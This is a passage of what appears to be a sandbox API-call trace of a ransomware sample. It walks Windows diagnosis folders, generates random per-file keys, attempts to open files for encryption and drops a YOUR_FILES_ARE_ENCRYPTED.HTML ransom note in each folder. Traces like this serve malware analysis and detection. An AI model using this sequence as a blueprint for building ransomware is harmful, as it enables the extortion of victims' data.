returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\*" [0106.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.257] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.258] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe010bd8d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe010bd8d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe010bd8d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="WINDOWS.DIAGNOSTICS.xml", cAlternateFileName="WINDOW~1.XML")) returned 1 [0106.258] StrStrIW (lpFirst="WINDOWS.DIAGNOSTICS.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.258] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml") returned 82 [0106.258] PathFindExtensionW (pszPath="WINDOWS.DIAGNOSTICS.xml") returned=".xml" [0106.258] lstrlenW (lpString=".xml") returned 4 [0106.258] PathFindExtensionW (pszPath="WINDOWS.DIAGNOSTICS.xml") returned=".xml" [0106.258] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.258] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe042cf6a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe042cf6a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe042cf6a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="WINDOWS.PERFTRACKESCALATIONS.xml", cAlternateFileName="WINDOW~3.XML")) returned 1 [0106.258] StrStrIW (lpFirst="WINDOWS.PERFTRACKESCALATIONS.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.258] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKESCALATIONS.xml") returned 91 [0106.258] PathFindExtensionW (pszPath="WINDOWS.PERFTRACKESCALATIONS.xml") returned=".xml" [0106.258] lstrlenW (lpString=".xml") returned 4 [0106.258] PathFindExtensionW (pszPath="WINDOWS.PERFTRACKESCALATIONS.xml") returned=".xml" [0106.258] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKESCALATIONS.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.259] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe05d08a5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe05d08a5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe05d08a5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="WINDOWS.PERFTRACKPOINTDATA.xml", cAlternateFileName="WINDOW~4.XML")) returned 1 [0106.259] StrStrIW (lpFirst="WINDOWS.PERFTRACKPOINTDATA.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.259] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml") returned 89 [0106.259] PathFindExtensionW (pszPath="WINDOWS.PERFTRACKPOINTDATA.xml") returned=".xml" [0106.259] lstrlenW (lpString=".xml") returned 4 [0106.259] PathFindExtensionW (pszPath="WINDOWS.PERFTRACKPOINTDATA.xml") returned=".xml" [0106.259] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackpointdata.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.260] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe0263207, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe0263207, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe0263207, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="WINDOWS.SIUF.xml", cAlternateFileName="WINDOW~2.XML")) returned 1 [0106.260] StrStrIW (lpFirst="WINDOWS.SIUF.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.260] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml") returned 75 [0106.260] PathFindExtensionW (pszPath="WINDOWS.SIUF.xml") returned=".xml" [0106.260] lstrlenW (lpString=".xml") returned 4 [0106.260] PathFindExtensionW (pszPath="WINDOWS.SIUF.xml") returned=".xml" [0106.260] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.260] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3a, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="Windows.Uif.static", cAlternateFileName="WINDOW~1.STA")) returned 1 [0106.260] StrStrIW (lpFirst="Windows.Uif.static", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.260] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\Windows.Uif.static") returned 77 [0106.260] PathFindExtensionW (pszPath="Windows.Uif.static") returned=".static" [0106.260] lstrlenW (lpString=".static") returned 7 [0106.260] PathFindExtensionW (pszPath="Windows.Uif.static") returned=".static" [0106.260] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe080ca95, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="WINDOWS.UIF.xml", cAlternateFileName="WICECA~1.XML")) returned 1 [0106.260] StrStrIW (lpFirst="WINDOWS.UIF.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.260] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml") returned 74 [0106.260] PathFindExtensionW (pszPath="WINDOWS.UIF.xml") returned=".xml" [0106.260] lstrlenW (lpString=".xml") returned 4 [0106.260] PathFindExtensionW (pszPath="WINDOWS.UIF.xml") returned=".xml" [0106.260] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.261] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe080ca95, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="WINDOWS.UIF.xml", cAlternateFileName="WICECA~1.XML")) returned 0 [0106.261] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.262] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0106.262] GetProcessHeap () returned 0x600000 [0106.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.263] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.265] CloseHandle (hObject=0x314) returned 1 [0106.265] GetProcessHeap () returned 0x600000 [0106.265] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.265] GetProcessHeap () returned 0x600000 [0106.265] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.266] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="DownloadedSettings", cAlternateFileName="DOWNLO~2")) returned 1 [0106.266] StrStrIW (lpFirst="DownloadedSettings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.266] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings") returned 57 [0106.267] GetProcessHeap () returned 0x600000 [0106.267] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.268] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings" [0106.268] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\*" [0106.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.270] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.270] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xdfc4722e, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xdfc4722e, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xdff8e649, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x1c9, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="cfc.flights.json", cAlternateFileName="CFCFLI~1.JSO")) returned 1 [0106.270] StrStrIW (lpFirst="cfc.flights.json", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.270] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json") returned 74 [0106.270] PathFindExtensionW (pszPath="cfc.flights.json") returned=".json" [0106.270] lstrlenW (lpString=".json") returned 5 [0106.270] PathFindExtensionW (pszPath="cfc.flights.json") returned=".json" [0106.270] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.270] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\cfc.flights.json"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.271] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe0db65ac, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x4a30b, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="telemetry.ASM-WindowsDefault.json", cAlternateFileName="TELEME~1.JSO")) returned 1 [0106.271] StrStrIW (lpFirst="telemetry.ASM-WindowsDefault.json", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.271] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json") returned 91 [0106.271] PathFindExtensionW (pszPath="telemetry.ASM-WindowsDefault.json") returned=".json" [0106.271] lstrlenW (lpString=".json") returned 5 [0106.271] PathFindExtensionW (pszPath="telemetry.ASM-WindowsDefault.json") returned=".json" [0106.271] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.271] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.271] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x334, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="telemetry.ASM-WindowsDefault.json.bk", cAlternateFileName="TELEME~1.BK")) returned 1 [0106.271] StrStrIW (lpFirst="telemetry.ASM-WindowsDefault.json.bk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.271] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk") returned 94 [0106.271] PathFindExtensionW (pszPath="telemetry.ASM-WindowsDefault.json.bk") returned=".bk" [0106.271] lstrlenW (lpString=".bk") returned 3 [0106.271] PathFindExtensionW (pszPath="telemetry.ASM-WindowsDefault.json.bk") returned=".bk" [0106.271] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe0964002, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe0db65ac, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x14615, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="utc.app.json", cAlternateFileName="UTCAPP~1.JSO")) returned 1 [0106.271] StrStrIW (lpFirst="utc.app.json", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.271] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json") returned 70 [0106.271] PathFindExtensionW (pszPath="utc.app.json") returned=".json" [0106.272] lstrlenW (lpString=".json") returned 5 [0106.272] PathFindExtensionW (pszPath="utc.app.json") returned=".json" [0106.272] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.272] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.272] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x598, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="utc.app.json.bk", cAlternateFileName="UTCAPP~1.BK")) returned 1 [0106.272] StrStrIW (lpFirst="utc.app.json.bk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.272] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk") returned 73 [0106.272] PathFindExtensionW (pszPath="utc.app.json.bk") returned=".bk" [0106.272] lstrlenW (lpString=".bk") returned 3 [0106.272] PathFindExtensionW (pszPath="utc.app.json.bk") returned=".bk" [0106.272] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x598, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="utc.app.json.bk", cAlternateFileName="UTCAPP~1.BK")) returned 0 [0106.272] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.273] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0106.273] GetProcessHeap () returned 0x600000 [0106.273] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.273] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedsettings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.275] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.276] CloseHandle (hObject=0x314) returned 1 [0106.276] GetProcessHeap () returned 0x600000 [0106.276] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.276] GetProcessHeap () returned 0x600000 [0106.276] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.277] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="ETLLogs", cAlternateFileName="")) returned 1 [0106.278] StrStrIW (lpFirst="ETLLogs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.278] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs") returned 46 [0106.278] GetProcessHeap () returned 0x600000 [0106.278] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.279] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs" [0106.279] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\*") 